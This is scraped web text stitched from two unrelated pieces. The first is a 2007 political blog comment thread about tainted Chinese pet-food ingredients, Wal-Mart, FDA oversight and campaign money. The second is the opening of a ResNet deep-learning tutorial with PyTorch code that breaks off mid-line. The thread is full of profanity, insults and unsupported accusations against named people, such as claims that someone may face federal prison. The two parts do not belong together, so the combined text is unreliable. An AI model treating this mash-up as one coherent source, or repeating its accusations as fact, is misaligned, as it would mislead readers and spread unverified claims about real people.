Gazette that ‘I have made the decision not to let my name go forward to the Senate. … I don’t want to be part of that partisan circus.’ “One of the questions Griffin may want to avoid is a detailed recounting of his courtroom experience.” Quoted under Fair Use; for complete story and/or copyright info, see . For the BBC/Palast article on the GOP “caging” operation to disenfranchise soldiers deployed overseas, see . Interfering with a person’s right to vote because of his/her race has been a federal felony since passage of the Voting Rights Act in 1965; I hope one of President Obama’s first official acts is to appoint a special prosecutor to investigate the GOP “caging” operations, and because Griffin was personally involved in these operations, there’s a good chance he could end up in a federal prison. Roger Rabbit spews: @6 “Ships are loaded with empty containers being shipped BACK to china for Refill. Ocean freight is soooo cheap going to china. Anyone wanna guess why? Americans consume more imports than they export. It Starts at home. Buy american.” Well, that’s easy enough — don’t shop at Wal-Mart. Roger Rabbit spews: 95% of what Wal-Mart sells is made in China. If they could import coolie slave labor to work in their stores, they would. Roger Rabbit spews: @9 And you’re saying government works better if it’s run by people who hate government and the citizenry? Or are you saying you’re against ANY government and believe in an every-person-for-himself society … in other words, you’re an anarchist like these guys: Roger Rabbit spews: So let me get this straight. China buys wheat from the U.S., the wheat is shipped to China for processing, then is shipped back to the U.S. for use as dog and cat food? And this is a good use for the world’s limited supply of oil? Another market failure. Roger Rabbit spews: Why not process U.S. wheat into human and pet food in U.S. factories with American workers? Why do we waste oil to send OUR wheat to China just to avoid paying decent wages to OUR workers? Roger Rabbit spews: And CHEAP LABOR CONSERVATIVES want us to let them run our government? It’s bad enough they run our businesses. DeeAnn spews: Big business now controls how things are run in this country. As far as Dem vs. Rep I can’t tell much difference anymore–they each do a lot of harm. Power/greed it is interchangable. Richard Pope spews: How much does the unnamed Chinese food supplier contribute to the Democrat National Committee? Richard Pope spews: ChemNutra must be a Democrat company. From their website: “We are qualified as a woman-owned and minority-owned company.” Sounds like a bunch of liberal Democrats who are in business only because of affirmative action and quotas. How many innocent dogs and cats (and maybe even human beings) are going to die beucase of this liberal Democrat obsession with affirmative action and quotas? SeattleJew spews: Imagine the dollars that go into attempting to have no more tha1/10 space shuttle launches crash. Now imagine the world food supply. ArtFart spews: 23-24 Hate to be the one to ruffle your fur with this, Roger, but it ain’t just Wal-Mart. Go into Freddie’s, Penney’s, the Bon–er, I mean Macy’s, Eddie Bauer, Circuit City, Fry’s, Costco…hell, go down to Portland and take a walk through Sak’s, and look at the labels. Everything’s from China, or occasionally Mexico, Pakistan, Bangladesh or Singapore. Roger Rabbit spews: Wal-Mart Spying On Critics “Reuters “NEW YORK (April 4) –. … “Gabbard said in the Journal that he recorded the calls on his own because he felt pressured to stop embarrassing leaks. But he said … most of his spying activities were sanctioned by superiors. “A company spokeswoman, Sarah Clark, characterized its security operations as normal. ‘Like most major corporations, it is our corporate responsibility to have systems in place, including software systems, to monitor threats to our network and our intellectual property so we can protect our sensitive business information,’ she said in the Journal. ‘It is also standard practice to provide physical and information security for our corporate events and for our board of directors and senior executives.'” Quoted under Fair Use; for complete story and/or copyright info see Roger Rabbit Commentary: I guess if you’re big and powerful enough you can pretend you’re a government and create your own police state. You can take it for granted that Wal-Mart, which is notoriously anti-union, doesn’t limit its spying to “security for corporate events and executives” but is also infiltrating and conducting (probably illegal) surveillance of labor organizers as well as community activists who oppose new Wal-Mart store locations. Chadt spews: Mr. Pope, Have you had too much to drink tonight??? Richard Pope spews: And I believe the really massive flood of cheap Chinese imports started during the Clinton administration. Richard Pope spews: No wonder. Hillary Clinton served on the Wal-Mart board of directors. Wonder if cat and dog owners are going to vote for her now? Richard Pope spews: Didn’t Bill Clinton allow China to join the World Trade Organization? Roger Rabbit spews: Private Equity Firms Fueling Romney Campaign A financial blog I found on AOL reveals a little-known fact about GOP candidate Mitt Romney’s big fundraising numbers, which surprised the media this week: “The private equity presidency? “Posted Apr 3rd 2007 5:48PM by Tom Taulli “This week, we got the tallies on the fundraising for the upcoming presidential election. As expected, the numbers are big. For example, Hillary Clinton raised a cool $26 million in the first quarter. “But there was one apparent surprise; that is, Republican Mitt Romney raised $21 million. Not bad for someone who doesn’t have much name recognition with the American populace. “Then again, he is well-known in the private equity world. You see, back in 1984, Romney founded Bain Capital Partners, LLC. The firm … currently manages $38 billion. “Yes, it’s fertile ground for a politician to get big-time contributions. What’s more, as private equity firms get bigger, they will realize they need to be more politically savvy. “With his connections, there shouldn’t be any shortage of money for Romney and it’s a good bet we’ll be seeing a lot more of him.” Roger Rabbit Commentary: What are private equity firms? Well, they’re groups of investors you’re not allowed to join who take public companies private so you can’t profit from their stock and they take the cream off the top and then spit out the companies by taking them public again. In other words, they’re Wall Street sharks who get fabulously wealthy by bleeding ordinary investors. Looks like these guys are trying to buy themselves a president. Roger Rabbit spews: For example, Michael Dunmire runs a private equity firm and funds Tim Eyman’s initiative campaigns. Do you want people like Dunmire choosing the next president? Do you want a president who sucks up to people like Dunmire? If so, then Mitt Romney’s your man. Roger Rabbit spews: @38 Didn’t Tricky Dicky Nixon let China into the world in the first place? Does Wal-Mart sell goods made by political prisoners? Roger Rabbit spews: @29 My dear, there certainly are problems with how much Democrats suck up to corporations, but as the Bush administration has proved, it does make a difference whether we’re getting screwed by Democrat corporatists or Republican corporatists. Roger Rabbit spews: 30 “How much does the unnamed Chinese food supplier contribute to the Democrat National Committee?” Have you stopped beating your dog yet, Richard? Roger Rabbit spews: @31 Actually, it sounds more like a bunch of rich white Republican guys who are cheating the legitimate women’s and minority businesses of government contracts. This is one of the programs I worked with during my long (30 years) tenure with the state; and I can tell you that putting the company in the wife’s or girlfriend’s name to get preferential treatment in government contracting is an old, old scam. Now, Initiative 200 (or whichever) did away with the contracting preferences for minorities and women, but there are still some benefits from registering as a minority or women-owned business, and the cheaters are still doing it. Trust me on this, Richard. Things aren’t always as they appear in the application forms. My Left Foot spews: I can’t resist. Richard Pope. What a fucking jackass. You are doing a great impression of Monkeyface. Making wild accusations without any evidence. Woman run company, this is your evidence? What, you don’t have women in the Republican party? Well none that will date you, I guess. You know Richard, I smell a class action coming on. Maybe you could get involved and make some real lawyer money? I am glad to see some of our wingnut friends having the backbone to call bullshit on the government on this issue. Shame they won’t do the same with the war. You know, where thousands of America’s young men and women are dying needlessly. Funny how that works. Roger Rabbit spews: A typical women-owned business works like this. The rich white Republican guy “sells” his business to his mistress. No money changes hands; only title and IOUs change hands. I saw a case where a part-time waitress making about $10,000 a year “bought” a business for about $3 million by signing her name to a piece of paper. She then “hired” her boyfriend and paid him $8 an hour to run the business. The loan collateral was her kid; I suppose if they had an argument and she got uppity and started acting like she actually owned or ran the business he would tell her to do things his way or he’d kill the little girl, or something like that. That’s how it works in the real world, Richard. Roger Rabbit spews: But the kid got a pony out of it. Richard Pope spews: Roger Rabbit @ 39 So you are saying that Mitt Romney is the Republicans’ answer to George Soros? Roger Rabbit spews: However, if her mommy got too big for her britches, he could repossess the pony any time he wanted because the pony was in his name. In fact, the pony was the ONLY thing in his name! Not only the business, but also the 7,000-square-foot house, the 7 cars, the horse ranch — all were in the waitress’s name. As I recall, he hadn’t been filing tax returns for quite a while. Roger Rabbit spews: @48 No. There’s no comparison whatsoever, Richard. The only thing George Soros wants is honest and competent management of the government. Roger Rabbit spews: @33 Yeah, Art; but is Freddie’s or Costco sending phony-longhairs out to spy on community activists? I don’t see anyone trying to throw Fred Meyer or Costco out of their community. Roger Rabbit spews: Let’s be honest here: Clinton had his fingers in the job-giveaway by signing off on some of these lopsided trade agreements that basically tell American workers to go fuck themselves. He took heat from organized labor for it, and did it anyway. But who was the impetus behind it? That stuff was sent to Clinton’s desk by Republican Congresses. And does anyone believe that Bush has made it better, or that anything will improve for American workers or consumers by voting Republican? Roger Rabbit spews: @35 No, but he’s up late because his law practice isn’t exactly prospering and he doesn’t have anything to do in the office tomorrow. Roger Rabbit spews: @37 I hope not. I don’t want Hillary. However, she’s a far, far better choice than ANYONE on the GOP side. Roger Rabbit spews: Did you listen to NBC News last night, Richard? NBC’s Tim Russert intimated that when Obama’s fundraising numbers are announced tomorrow, they’re going to “shock the political world.” Russert seems to have some inside information that as breathtaking as Hillary’s first-quarter numbers are, Obama did even better! Money is important, of course, not only because candidates who can’t raise enough money won’t be able to compete in the primaries, but because it shows how the people who place financial bets on the outcome are placing odds on the various candidates. And this is now shaping up as a 5-person race: Hillary, Obama, and Edwards on the Democratic side; and Romney and Guiliani on the Republican side. McCain appears poised to become the first big name forced out of the race. Roger Rabbit spews: On the Republican side of Lake Washington, the State Patrol ticketed 52 HOV lane cheaters in 2 hours. It must be the sense of entitlement all those arrogant assholes have. righton spews: darcy got another ticket? RightEqualsStupid spews: Always listen to the advice of a guy like Pope. After all, he’s been SOOOOO successful in his career…. Here are some lowlights: 1) Divorced 2) Admonished by the legal profession 3) Rated NOT QUALIFIED by his peers 4) Rejected by voters so many times nobody has an accurate count but it could be as high as 18 times 5) Admitted to mental health issues Yep Dickie, we REALLY care about your opinion. After all, it’s proven to be so valuable in the past. RightEqualsStupid spews: Helluva Job Brownie! RightEqualsStupid spews: Support our troops – take their place. RightEqualsStupid spews: Mission Accomplished! Richard Pope spews: Roger Rabbit @ 56 There is a Republican side of Lake Washington anymore? Richard Pope spews: RightOn @ 57 Not that I can tell. Libertarian spews: Roger said, Roger Rabbit says: “…The only thing George Soros wants is honest and competent management of the government.” ======= The only thing George Soros wants is to have free reign to manipulate international currencies to benefit himself. He wants to be declared Supreme Being of the Universe. Fortunately, he won’t live forever. Right Stuff spews: Roger Rabbit says: . 04/03/2007 at 10:02 pm Nice opinion statement that you quoted Rabbit. I would imagine that 90%+ of the folks at the FDA are career employees. Bottom line here. I know that you need and expect the govt to take care of you. Unfortunately no matter what party is in control of the govt, that isn’t going to happen (less we become stalinist, communist state) It’s really fun to watch how you radicals tie the Bush admin to everything…. Let me help out. “Yet the federal regulators, WHO ARE PROBABLY ON A NO BID CONTRACT FROM HALIBURTON, charged with safeguarding our food supply, EXCEPT THAT THE CHENEY-RUMSFELD CABAL HAS MISDIRECTED THE COUNTRY FOR A WAR OF CHOICE AGAINST THAT POOR INNOCENT FREEDOM FIGHTER SADDAM HUSSEIN, seemed more concerned with protecting the interests of the corporations, LIKE HALIBURTON, EXXON, BIG OIL, WALMART, CEO’S AND LOBBYISTS, then in giving consumers the facts they needed to make informed decisions on their own, OF COURSE WHAT I MEAN BY INFORMED DECISION OF THEIR OWN IS WHAT MY PARTY IS TELLING ME TO THINK. COMMRADE” headless lucy spews: .” Lack of funding in the last 5 years? Hmmmmmn…… Must be Clinton’s fault! John Barelli spews: As Roger is probably still sleeping off a long night entertaining Mrs. Rabbit, I’ll take this. Government agencies tend to take their lead from the top. Career civil servants either learn to follow that lead or they change employers. As far as the expectation of government “taking care of me”, you might be surprised that, as I have a certain libertarian leaning, I tend to agree with you more often than not. But some functions are such that individuals are not readily able to perform them, and are better dealt with in a collective, governmental arena. While I’m in favor of the Second Amendment, I’m not in favor of private armies. Police, fire protection, parks, schools, libraries are all legitimate government functions. As is testing food supplies. I cannot test for every possible contaminant, nor can I go down to the docks and test food stocks coming in from overseas. I must rely on the FDA for that function. Large corporate food suppliers have, for the most part, replaced the local farmers’ market. When I eat lunch, my hamburger contains Washington beef, which was fed using foreign feed, the tomato comes from Argentina, the lettuce from Mexico, the onion from Peru and the bun made with wheat gluten from China and sesame seeds from India. Large corporations with the ability (and sometimes the will) to conceal important information from me are providing every item in that hamburger. I must rely on the FDA and the government to police this, as it is beyond my ability. Tlazolteotl spews: Richard Pope. I agree with you that WalMart is evil, and I don’t shop there (plus, I don’t like having to navigate all the dumbed down fatasses that tend to shop there). On the other hand, your comments @30/31 are just silly. US companies contract with suppliers, and expect US regulators to add a little security regarding enforcement of laws re adulteration etc. It is the Grover Norquist vision of government that is failing, just as we saw during Katrina. Yes, they’ve cut funding for agencies until they can’t do their jobs effectively – now the free-marketeers can whine about how gov is ineffective, and promise that privatizing it would be better. This is a betrayal of good government principals, and it is sending us into a second robber-baron age. You may disagree, but I do not think this is a good thing. Tree Frog Farmer spews: JohnBarelli@67 The issue goes beyond your thesis. Anyone with a cursory acquaintanceship with The Jungle knows the pre-eminent role government can play in safeguarding public health and safety, particularly where the food chain is concerned. Unhappily, certain elements of our current adninistration want to roll many of our standards back to the turn of the century. Tree Frog Farmer spews: Hmm, showing my age here, that would be the turn of the previous centurt, ie. 1900. calguy spews: n San Francisco now 2-3 weeks back there was a `bug’ going around among elementary school kids. My preschool aged son got it-symptoms were vomiting followed by lethargy, mild fever, diarrhea–what was weird about the bug is that my wife got full on exposure but did not get sick — she cleaned up most of the damage and the last time this happened with a bug in January she subsequently got sick. What is also weird is that my son seems to have lingering irritability. Usually most of our household gets sick with any given bug, but not this one. OK, note that the symptoms are much the same as the dogs and cats exposed to the tainted food, and that to a large degree this was not transmissible. The timing–March 15 +/- a few days, shortly after the wave of pet cases. My question to the Horse’s ass community is this–any similar `bugs’ out there among kids with similar evidence for a lack of transmissibility? The gluten could be in any number of products that kids eat (hot dog buns, fish sticks, wieners, hamburgers, cookies–). This is very hard to find looking around the internet. While you can get local info from advice nurses on children’s health, they tend to write this off as a bug running around. Fair enough, but the epidemiology seems off to me. John Barelli spews: TreeFrogFarmer: Certainly the issue goes beyond my comments, which were simply written to debunk the idea that government is an inappropriate venue to deal with the issue. Back around 1900, most people had some idea of where their food came from. Much of it was grown in their back yard, or from local farmers. There was an automatic accountability. Sell food that makes folks sick, people stop buying from you, you go bankrupt, and someone else takes over your farm or store. Now it’s difficult to even figure out which major company is actually supplying the end product, much less figure out where the components are coming from. (For a while I made an effort to avoid Kraft products, as I disliked their parent company, Phillip Morris, and didn’t wish to support them with my purchases. Try doing that for just one shopping trip. You’ll be amazed how many things that one company supplies, and I’d be willing to bet that unless you shop exclusively at the Farmers Market or Trader Joe’s, you’ll miss something. If you routinely buy processed or packaged foods you will almost certainly buy something supplied, processed, packaged or distributed by Kraft. But I digress.) Most folks don’t have the resources to take on a multi-billion dollar corporation and force them to divulge where they’re getting the components for their products. Heck, even when the government is actively trying to police them, there are still problems. Since I’m unwilling to simply grow all my own food, I must rely on the government to police the suppliers, and with our current government’s “let’s just trust them” attitude, that is a very frightening reality. Steve spews: China is a CESSPOOL of pollution! Why in the FUCK are we getting food from there? And if so, why don’t labels say so??? Roger Rabbit spews: @62 Temporarily, but not for long. Within 18 months you’ll have a hard time finding a “red” county anywhere north of the M-D line. Roger Rabbit spews: @64 Isn’t that what capitalism is all about? Everybody grabbing as much as they can until one guy gets it all and is king of the hill? Roger Rabbit spews: @65 “Bottom line here. I know that you need and expect the govt to take care of you.” Isn’t that exactly what wingers like Reagan and Bush do when they pour trillions into defense? How much sense does it make to spend 10,000 times as much on guns as on food safety? And since when do “career employees” make policy decisions? Roger Rabbit spews: Would someone please recycle these ignorant wingnuts back to grade school for a basic education on how government works (or doesn’t). Roger Rabbit spews: Let’s not forget the criminally corrupt Bush administration wanted to fire all the federal meat inspectors and give taxpayer money to meat packing companies to hire their own inspectors. Does anyone really believe an inspector will fail any meat if the guy who can fire him works for the plant manager? Roger Rabbit spews: I hope you all took note of the fact that “Right Stuff” equates competent food inspection with “Stalinism” and “communism.” And these guys want us to let THEM run our government? Just remember in November whooooo wants to privatize (and bastardize) the safety of what you put in your body. Roger Rabbit spews: Of course, the GOP will never run on a platform of “no food inspection.” That’s their platform, but they know what would happen to them at the polls if voters knew what they really stand for. That’s why they have to lie about Democrats and create distractions. They don’t dare run on issues! Roger Rabbit spews: 69, 70 The very first government regulation on this continent was the weights and measures ordinances adopted by colonists almost immediately after they stepped off Plymouth Rock. The very first Republicans on this continent were the shopkeepers who tried to cheat their colonist customers. Roger Rabbit spews: @73 We aren’t getting food from China. We’re shipping our own food (wheat) to China for processing, then shipping it back, so we don’t create jobs for American labor. Another reason is because we more cheap oil than we know what to do with and it’s necessary to burn it up in ships transporting wheat back and forth so we don’t drown in surplus oil. Or, alternatively, you could look at this as another fucking failure of free-market economics. Roger Rabbit spews: … we have more cheap oil … Roger Rabbit spews: But don’t worry, Redneck’s “invisible hand” will keep finding more oil forever, when it’s not busy with domestic chores under his raincoat (snicker). Roger Rabbit spews: As Redneck knows, free-market economics puts more oil in the ground every day. ArtFart spews: For the benefit of those of you who just fell off the turnip truck or suffer from early-onset dementia, the groundwork for our present relationship with the Peoples’ Republic of China was laid by Richard Milhous Nixon. Right Stuff spews: @79 Not exactly. More to the point I equate your political beliefs with those of Stalin and Communism. Not food inspection. As I stated it is your radical view, in which you tie all things bad to the Bush admin, is what I find amusing. I’m not well enough versed in the workings of the FDA to opine on whether or not food inspection should be privatized. I am damn sure your not. What I want to know, and will be watching is what steps are taken to take care of the true problem here, which is China. Public safety is certainly one of the functions I believe our govt is responsible for. ArtFart spews: Eric Schlosser, in “Fast Food Nation” describes how the FDA and USDA under Reagan failed to do anything substantial when the e. coli outbreak at the Aurora Jack-In-The-Box led to the revelation that we were being sold meat laced with shit. It turned out McDonald’s, as the beef industry’s single largest customer, did more than any other entity to force the packing houses to clean up their act. Seems they had some understanding that they wouldn’t get much repeat business if their customers died. ArtFart spews: I’m especially disturbed by all the frantic “assurances” we’re being given that none of the tainted wheat gluten is getting into the human food supply. How difficult would it be for there to be some confusion over which cans were getting labeled “Morsels and Gravy” and which were getting labeled “Dinty Moore”? Right Stuff spews: @67 Mr. B “Government agencies tend to take their lead from the top. Career civil servants either learn to follow that lead or they change employers.” Yes and no. I agree that the agency receives direction and steering from the top, however, my point is that most bureaucrats tend to stay in positions despite personal political beliefs because the job and benefits outway their political loyalties. The vast majority of federal agencies don’t roll over their employee base every 4-8 years… ArtFart spews: Let’s take it one step further…how cavilier is the food industry being about what products it puts wheat gluten into and how they’re labeled? Wheat gluten allergy isn’t all uncommon. Right Stuff spews: “McDonald’s, as the beef industry’s single largest customer, did more than any other entity to force the packing houses to clean up their act. Seems they had some understanding that they wouldn’t get much repeat business if their customers died” Be cafeful of who’s point you’re making here! headless lucy spews: re 92: McDonald’s encourages the destruction of the Amazon rain forest. There’s a very good reason those burgers only cost .99 cents. Clancy J. spews: You’re a fool if you trust any government agency with anything anymore…under the Bushies’ plan to seed America with good ‘n loyal ciphers, no agency is worth a crap. The people running government agencies in 2007 are wholly incompetent; they’re not chosen for their jobs based on any kind of expertise in a given field. It’s a raise of the hand, a swearing of fealty to Bush/Rove/Republican domination, and no oversight whatsoever. Our lives are expendable to them, our democracy is a plaything, and their despotic ideology is a lice contagion. Eat organic if you can, eat from your garden, etc. Don’t believe a damn thing they say – in fact, play the inverse-proportionalities game: if they say A, B is the case, and if they come down hard on C, embrace D for its succor. They’re criminals after two things: wealth and power. They’re getting those things. Consumers and troops are just what those words imply, and sure aren’t living, breathing people. Pay attention. Davol spews: Our food has been going this way since Monsanto started importing my tomatoes from New Jersey. We need to rethink how we provide food for ourselves in a way which is more locally provided, and provides less corporate pocket lining from the corporatising of our food. This is only one way the corporatising of our food is killing us and making our country less safe. The buy-Organic movement is off the ground and may soon be the favored alternative to MEGA-GeneticallyEngineered-uninformatively-labeled-Food. Especially if a couple more fiascoes like this pet killing food scandal keep occurring. Currently the trend looks like it will get worse before we make it better. Karl H. Weiss spews: Does anyone out there have any idea how many poor old people are sick or dying from eating cat or dog food?
http://horsesass.org/does-fda-spell-fema/
CC-MAIN-2017-22
refinedweb
8,929
62.07
(you’re here!) - TypeScript’s Literal Type Guards and “in” Operator! Table of contents User Defined Type Guards mean that the user can declare a particular Type Guard or you can help TypeScript to infer a type when you use, for example, a function. We will demonstrate this with the following code: class Song { constructor(public title: string, public duration: number) {} } class Playlist { constructor(public name: string, public songs: Song[]) {} } function getItemName(item: Song | Playlist) { if(item instanceof Song) { return item.title; } return item.name; } const songName = getItemName(new Song('Wonderful Wonderful', 300000)); console.log('Song name:', songName); const playlistName = getItemName( new Playlist('The Best Songs', [new Song('The Man', 300000)]) ); console.log('Playlist name:', playlistName); The instanceof and typeof operators aren’t always the best tool to use. In a scenario where you may want to create or break something down into a reusable function, we lose the type inference if we do not actually have it in our item instanceof Song because TypeScript cannot infer the type further down. There is a way around are going to do is create a function and we’ll say this is a Song. If it is a Song return me the title, otherwise return me the name. function getItemName(item: Song | Playlist) { if(isSong(item)) { return item.title; } return item.name; } If we were to do this we would be getting some errors from TypeScript. One red underline would be under title and the other under name. Let’s go an create the function isSong. We will pass the argument item of type any. We are not going to change the behaviour but we are going to say is the item is an instanceof Song. function isSong(item: any) { return item instanceof Song; } This code would completely work at runtime however at the compile time with TypeScript we might get a boolean back from our getItemName function on isSong , which is the inferred type because instanceof will return true or false. However we don’t get any type information. Instead of doing something like this: function getItemName(item: Song | Playlist) { if(isSong(item)) { return (item as Song).title; } return item.name; } We want to let our Union type in the function argument instruct TypeScript of what we are dealing with. This is the crucial part for understanding a user defined type guard. So in our isSong function we can provide extra information. We can say that item is a Song. That way when this function evaluates to true we are manually defining and we are returning type information to say that if this function successfully returns true then what we are dealing with is a Song. function isSong(item: any): item is Song { return item instanceof Song; } This is what we call a User Defined Type Guard, you can create any kind of type, any kind of check but it’s up to you to make sure that the item instanceof song, in this case, returns a boolean. If we were to return an object instead we would see an error because we can only use the is syntax when we are testing something like a boolean. We need to always return a boolean and you will see the is syntax whenever something is returning a boolean but it is supplying further type information, which we can then use. So this is a User Defined Type Guard, you can use them with your own types, the custom types (like we just saw with Song), if in your application you want to say it’s going to be a string array you can do exactly that. You have complete flexibility over what types you want to tell TypeScript are coming back.
https://ultimatecourses.com/blog/user-defined-type-guards-in-typescript
CC-MAIN-2021-21
refinedweb
619
69.21
This page outlines the naming guidelines you should follow when creating buckets and uploading objects in Cloud Storage. To learn how to create a bucket, see the Creating storage buckets guide. Bucket name requirements Your bucket names must meet the following requirements: - adjacent to another period or dash. For example, ".." or "-." or ".-" are not valid in DNS names. Bucket name considerations Bucket names reside in a single Cloud Storage namespace. This mean that: - Every bucket name must be unique. - Bucket names are publicly visible. If you try to create a bucket with a name that already belongs to an existing bucket, Cloud Storage responds with an error message. However, once you delete a bucket, you or another user can reuse its name for a new. See also the Naming Best Practices section, which includes recommendations about excluding proprietary information from bucket and object names. with buckets, existing objects cannot be directly renamed. Instead, you can copy an object, give the copied version the desired name, and delete the original version of the object. See Renaming an object for a step-by-step guide, which includes instructions for tools like gsutil and the Google Cloud Platform Console, which handle the renaming process automatically.
https://cloud.google.com/storage/docs/naming?hl=th
CC-MAIN-2019-30
refinedweb
202
55.84
Node.js Application Configuration Files December 13, 2010 9 Comments What is the best practice to make configuration file for your Node.js application? Writing property file parser or passing parameters at command line is cumbersome. Eval One easy way to separate configuration and application code is by using eval statement. Define your configuration as simple Javascript associative array and load and evaluage it on app startup. Example configuration file myconfig.js settings = { a: 10, // this is used for something SOME_FILE: "/tmp/something" } Then at start of your application var fs = require('fs'); eval(fs.readFileSync('myconfig.js', encoding="ascii")); Now settings object can be used as your program settings. e.g. var mydata = fs.readFileSync(settings.SOME_FILE); for( i = 0 ; i < settings.a ; i++) { // do something } Require Another alternative to load configuration, as stated in comments, is to define configuration as module file and require it. //-- configuration.js module.exports = { a: 10, SOME_FILE: '/tmp/foo' } In application code then require file var settings = require('./configuration'); This prevents other global variable creeping in global scope, but it’s hackier to do dynamic configuration reloading. If you detect that file has changed, and would want to reload it at runtime you must delete entry from require cache and re-require the file. Another minor complication is that require uses its own search path (that you can override with NODE_PATH env. variable) so it’s more work to define dynamic location for configuration file in your app. (e.g. set it from command line). // to reload file with require var path = require('path'); var filename = path.resolve('./configuration.js'); delete require.cache[filename]; var tools = require('./configuration'); Plain javascript as configure file has benefit (and downside) that it’s possible to run any javascript in the settings. For example. settings = { started: new Date(), nonce: ~~(1E6 * Math.random()), a: 10, SOME_FILE: "/tmp/something" } Both of these methods are mostly matter of taste. Eval is bit riskier as it allows leaking variables to global namespace but you’ll never have anything “stupid” in the configuration files anyway. Right? JSON file I’m not fan of using JSON as configuration format as it’s cumbersome to write and most editors are not able to show syntax errors in it. JSON also does not support comments that can be a big problem in more complicated configuration files. Example configuration file myconfig.json { "a":10, "SOME_FILE":"/tmp/something" } Then at start of your application read json file and parse it to object. var fs = require('fs'); var settings = JSON.parse(fs.readFileSync('myconfig.json', encoding="ascii")); And then use settings as usual var mydata = fs.readFileSync(settings.SOME_FILE); for( i = 0 ; i < settings.a ; i++) { // do something } Merging configuration files One way to simplify significantly configuration management is to do hierarchical configuration. For example have single base configuration file and then define overrides for developer, testing and production use. For this we need merge function. // merges o2 properties to o1 var merge = exports.merge = function(o1, o2) { for (var prop in o2) { var val = o2[prop]; if (o1.hasOwnProperty(prop)) { if (typeof val == 'object') { if (val && val.constructor != Array) { // not array val = merge(o1[prop], val); } } } o1[prop] = val; // copy and override } return o1; } You can use merge to combine configurations. For example, lets have these two configuration objects. // base configuration from baseconf.js var baseconfig = { a: "someval", env: { name "base", code: 1 } } // test config from localconf.js var localconfig = { env: { name "test" db: 'localhost' }, test: true } Now it’s possible to merge these easily var settings = merge( baseconfig, localconfig ); console.log( settings. a ); // prints 'someval' console.log( settings.env.name ); // prints 'test' console.log( settings.env.code ); // prints '1' console.log( settings.env.db ); // prints 'localhost' console.log( settings.env.test ); // prints 'true' Thanks, this really helped me! Pingback: CodeBudo » Blog Archive » Application Configuration for Node.js There is a small typo in your post, the code to read a file and eval should be: eval(fs.readFileSync(‘myconfig.js’, encoding=”ascii”)); Thanks! Fixed. Why not just store your settings as a module? Then you can utilize require() to keep a single reference to it. appSettings.js: exports.settings = { settingName: ‘this is cool!’ , settingName2: true } Usage: var settings = require(‘./appSettings.js’).settings; console.log(settings.settingName); require() is good way to load settings, however I wanted to keep settings strictly as separate from the modules. Matter of taste methinks. Why on earth would you use eval? eval is evil. Use JSON instead, or with comments it’s cjson: With a dead simple .properties file: Nice article, thanks for sharing… one small addition… for your json file, you don’t have to use filesystem to load it. var settings = require(‘myconfig.json’); loads the json file as a json object in the settings variable (pretty much the same as your code did, but in one line).
https://bravenewmethod.com/2010/12/13/node-js-application-configuration-files/
CC-MAIN-2020-45
refinedweb
809
51.14
Introduction There have been a series of breakthroughs in the field of Deep Learning and Computer Vision. Especially with the introduction of very deep Convolutional neural networks, these models helped achieve state-of-the-art results on problems such as image recognition and image classification. So, over the years, the deep learning architectures became deeper and deeper (adding more layers) to solve more and more complex tasks which also helped in improving the performance of classification and recognition tasks and also making them robust. But when we go on adding more layers to the neural network, it becomes very much difficult to train and the accuracy of the model starts saturating and then degrades also. Here comes the ResNet to rescue us from that scenario, and helps to resolve this problem. What is ResNet? Residual Network (ResNet) is one of the famous deep learning models that was introduced by Shaoqing Ren, Kaiming He, Jian Sun, and Xiangyu Zhang in their paper. The paper was named “Deep Residual Learning for Image Recognition” [1] in 2015. The ResNet model is one of the popular and most successful deep learning models so far. Residual Blocks The problem of training very deep networks has been relieved with the introduction of these Residual blocks and the ResNet model is made up of these blocks. The problem of training very deep networks has been relieved with the introduction of these Residual blocks and the ResNet model is made up of these blocks. In the above figure, the very first thing we can notice is that there is a direct connection that skips some layers of the model. This connection is called ’skip connection’ and is the heart of residual blocks. The output is not the same due to this skip connection. Without the skip connection, input ‘X gets multiplied by the weights of the layer followed by adding a bias term. Then comes the activation function, f() and we get the output as H(x). H(x)=f( wx + b ) or H(x)=f(x) Now with the introduction of a new skip connection technique, the output is H(x) is changed to H(x)=f(x)+x But the dimension of the input may be varying from that of the output which might happen with a convolutional layer or pooling layers. Hence, this problem can be handled with these two approaches: · Zero is padded with the skip connection to increase its dimensions. · 1×1 convolutional layers are added to the input to match the dimensions. In such a case, the output is: H(x)=f(x)+w1.x Here an additional parameter w1 is added whereas no additional parameter is added when using the first approach. These skip connections technique in ResNet solves the problem of vanishing gradient in deep CNNs by allowing alternate shortcut path for the gradient to flow through. Also, the skip connection helps if any layer hurts the performance of architecture, then it will be skipped by regularization. Architecture of ResNet There is a 34-layer plain network in the architecture that is inspired by VGG-19 in which the shortcut connection or the skip connections are added. These skip connections or the residual blocks then convert the architecture into the residual network as shown in the figure below. Source: ‘Deep Residual Learning for Image Recognition‘ paper Using ResNet with Keras: Keras is an open-source deep-learning library capable of running on top of TensorFlow. Keras Applications provides the following ResNet versions. – ResNet50 – ResNet50V2 – ResNet101 – ResNet101V2 – ResNet152 – ResNet152V2 Let’s Build ResNet from scratch: Source: ‘Deep Residual Learning for Image Recognition‘ paper Let us keep the above image as a reference and start building the network. ResNet architecture uses the CNN blocks multiple times, so let us create a class for CNN block, which takes input channels and output channels. There is a batchnorm2d after each conv layer. import torch import torch.nn as nn class block(nn.Module): def __init__( self, in_channels, intermediate_channels, identity_downsample=None, stride=1 ): super(block, self).__init__() self.expansion = 4 self.conv1 = nn.Conv2d( in_channels, intermediate_channels, kernel_size=1, stride=1, padding=0, bias=False ) self.bn1 = nn.BatchNorm2d(intermediate_channels) self.conv2 = nn.Conv2d( intermediate_channels, intermediate_channels, kernel_size=3, stride=stride, padding=1, bias=False ) self.bn2 = nn.BatchNorm2d(intermediate_channels) self.conv3 = nn.Conv2d( intermediate_channels, intermediate_channels * self.expansion, kernel_size=1, stride=1, padding=0, bias=False ) self.bn3 = nn.BatchNorm2d(intermediate_channels * self.expansion) self.relu = nn.ReLU() self.identity_downsample = identity_downsample self.stride = stride def forward(self, x): identity = x.clone() x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x = self.relu(x) x = self.conv3(x) x = self.bn3(x) if self.identity_downsample is not None: identity = self.identity_downsample(identity) x += identity x = self.relu(x) return x Then create a ResNet class that takes the input of a number of blocks, layers, image channels, and the number of classes. In the below code the function ‘_make_layer’ creates the ResNet layers, which takes the input of blocks, number of residual blocks, out channel, and strides. class ResNet(nn.Module): def __init__(self, block, layers, image_channels, num_classes): super(ResNet, self).__init__() self.in_channels = 64 self.conv1 = nn.Conv2d(image_channels, 64, kernel_size=7, stride=2, 